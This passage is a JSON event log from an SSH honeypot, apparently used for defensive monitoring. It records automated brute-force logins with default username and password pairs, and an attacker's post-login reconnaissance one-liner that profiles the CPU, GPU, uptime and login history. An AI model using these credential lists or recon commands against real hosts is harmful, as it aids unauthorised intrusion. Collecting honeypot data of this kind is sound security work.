{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:00:10.131367Z","src_ip":"83.168.105.65","session":"e001f191a858"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:00:10.252590Z","src_ip":"83.168.105.65","session":"e001f191a858"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39502,"dst_ip":"1.2.3.4","dst_port":22,"session":"85d623869060","protocol":"ssh","message":"New connection: 212.227.125.160:39502 (1.2.3.4:22) [session: 85d623869060]","sensor":"my-vps","timestamp":"2025-08-26T12:00:11.188126Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:11.293458Z","src_ip":"83.168.105.65","session":"e001f191a858"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:11.582735Z","src_ip":"212.227.125.160","session":"85d623869060"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:00:11.583502Z","src_ip":"212.227.125.160","session":"85d623869060"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:00:12.876356Z","src_ip":"212.227.125.160","session":"85d623869060"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:13.927781Z","src_ip":"212.227.125.160","session":"85d623869060"}
{"eventid":"cowrie.session.closed","duration":30.85625648498535,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:23.351749Z","src_ip":"212.227.235.229","session":"dd494f3c7f96"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54646,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3bc552a6684","protocol":"ssh","message":"New connection: 83.168.105.65:54646 (1.2.3.4:22) [session: b3bc552a6684]","sensor":"my-vps","timestamp":"2025-08-26T12:00:25.417406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:25.419829Z","src_ip":"83.168.105.65","session":"b3bc552a6684"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:00:25.454488Z","src_ip":"83.168.105.65","session":"b3bc552a6684"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:00:25.601978Z","src_ip":"83.168.105.65","session":"b3bc552a6684"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:00:25.694896Z","src_ip":"83.168.105.65","session":"b3bc552a6684"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:00:25.695674Z","src_ip":"83.168.105.65","session":"b3bc552a6684"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:25.733961Z","src_ip":"83.168.105.65","session":"b3bc552a6684"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:25.735534Z","src_ip":"83.168.105.65","session":"b3bc552a6684"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38582,"dst_ip":"1.2.3.4","dst_port":22,"session":"bccef5beb8bf","protocol":"ssh","message":"New connection: 212.227.235.229:38582 (1.2.3.4:22) [session: bccef5beb8bf]","sensor":"my-vps","timestamp":"2025-08-26T12:00:39.578799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:39.645483Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:00:39.726452Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":44438,"dst_ip":"1.2.3.4","dst_port":22,"session":"61f99c654595","protocol":"ssh","message":"New connection: 83.168.105.65:44438 (1.2.3.4:22) [session: 61f99c654595]","sensor":"my-vps","timestamp":"2025-08-26T12:00:40.703361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:40.704326Z","src_ip":"83.168.105.65","session":"61f99c654595"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:00:40.740958Z","src_ip":"83.168.105.65","session":"61f99c654595"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:00:40.820623Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-26T12:00:40.850966Z","src_ip":"83.168.105.65","session":"61f99c654595"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:00:41.629955Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.630635Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.631123Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.632074Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.633125Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.634557Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.635358Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.636399Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.636880Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.637473Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.637991Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.638766Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.639249Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:41.887934Z","src_ip":"83.168.105.65","session":"61f99c654595"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T12:00:42.067579Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:42.068530Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:42.069694Z","src_ip":"212.227.235.229","session":"bccef5beb8bf"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:48.773993Z","src_ip":"212.227.125.160","session":"d5124a406c8f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:50.935593Z","src_ip":"212.227.235.229","session":"82ea5aeca305"}
{"eventid":"cowrie.session.closed","duration":180.27115941047668,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:50.940080Z","src_ip":"212.227.235.229","session":"82ea5aeca305"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37216,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5341c5af44c","protocol":"ssh","message":"New connection: 83.168.105.65:37216 (1.2.3.4:22) [session: c5341c5af44c]","sensor":"my-vps","timestamp":"2025-08-26T12:00:56.153455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:56.154995Z","src_ip":"83.168.105.65","session":"c5341c5af44c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:00:56.194773Z","src_ip":"83.168.105.65","session":"c5341c5af44c"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-26T12:00:56.314959Z","src_ip":"83.168.105.65","session":"c5341c5af44c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38296,"dst_ip":"1.2.3.4","dst_port":22,"session":"f38066fe43df","protocol":"ssh","message":"New connection: 196.251.86.249:38296 (1.2.3.4:22) [session: f38066fe43df]","sensor":"my-vps","timestamp":"2025-08-26T12:00:57.314871Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:57.355913Z","src_ip":"83.168.105.65","session":"c5341c5af44c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:57.634008Z","src_ip":"196.251.86.249","session":"f38066fe43df"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","